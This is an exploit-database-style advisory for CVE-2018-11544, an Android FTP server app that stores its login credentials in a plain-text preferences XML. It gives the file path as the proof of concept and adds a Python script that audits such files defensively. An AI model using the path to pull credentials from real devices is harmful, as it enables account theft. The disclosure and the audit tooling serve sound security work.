ManhNho

CVE-2018-11544

May 29th, 2018
# Exploit Title: Ftp Server - Insecure Data Storage
# Date: 2018-05-29
# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
# Version: 1.32 Android App
# Vendor: The Olive Tree
# Exploit Author: ManhNho
# CVE: CVE-2018-11544
# Category: Mobile Apps
# Tested on: Android 4.4

---Description---
Ftp Server 1.32 is affected by insecure data storage: confidential information is stored insecurely
on the system (i.e. poor encryption, plain text, access control issues, etc.).
An attacker can find out the username/password of a valid user via /data/data/com.theolivetree.ftpserver/shared_prefs/com.theolivetree.ftpserver_preferences.xml

---PoC---
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="prefPort">2221</string>
<string name="prefPasivePort">2300-2399</string>
<string name="prefUserpass">ManhNho</string>
<boolean name="prefEnergySave" value="false" />
<boolean name="prefShowHidden" value="false" />
<boolean name="prefShowCredentials" value="true" />
<string name="prefInterfaces">0</string>
<string name="prefHomeDir">1</string>
<string name="prefUsername">ManhNho</string>
<boolean name="prefReadonly" value="false" />
<boolean name="prefAnonymous" value="true" />
<boolean name="prefForeground" value="true" />
</map>
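
A defender-side check for the storage issue described above, as an added example that is not part of the original paste: it parses a shared_prefs XML file taken from a test device and flags credential-like keys whose values are stored readably. The key-name patterns, the severity labels, the reading of prefAnonymous as "anonymous login enabled", and the trimmed sample file are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample, trimmed from the preferences file shown in the PoC above.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="prefPort">2221</string>
<string name="prefUserpass">ManhNho</string>
<string name="prefUsername">ManhNho</string>
<boolean name="prefAnonymous" value="true" />
<boolean name="prefReadonly" value="false" />
</map>"""

# Assumption: key names containing these fragments hold credentials.
SECRET_KEY = re.compile(r"pass|pwd|secret|token|apikey", re.I)
# Values shaped like a hex digest (MD5/SHA-1/SHA-256 lengths) are reported
# separately: still worth review, but not a directly readable credential.
HEX_DIGEST = re.compile(r"^(?:[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64})$")


def audit_shared_prefs(xml_text):
    """Return a list of (severity, key, message) findings for one prefs file."""
    findings = []
    root = ET.fromstring(xml_text)
    for node in root:
        key = node.get("name", "")
        if node.tag == "string" and SECRET_KEY.search(key):
            value = (node.text or "").strip()
            if not value:
                continue  # nothing stored under this key
            if HEX_DIGEST.match(value):
                findings.append(("review", key, "digest-like value stored"))
            else:
                findings.append(("high", key, "credential stored in plain text"))
        elif node.tag == "boolean" and key == "prefAnonymous":
            # Assumption: value="true" means anonymous login is enabled
            # (inferred from the key name; the paste does not document it).
            if node.get("value") == "true":
                findings.append(("medium", key, "anonymous FTP access enabled"))
    return findings


if __name__ == "__main__":
    for severity, key, message in audit_shared_prefs(SAMPLE_PREFS):
        print(f"[{severity}] {key}: {message}")
```
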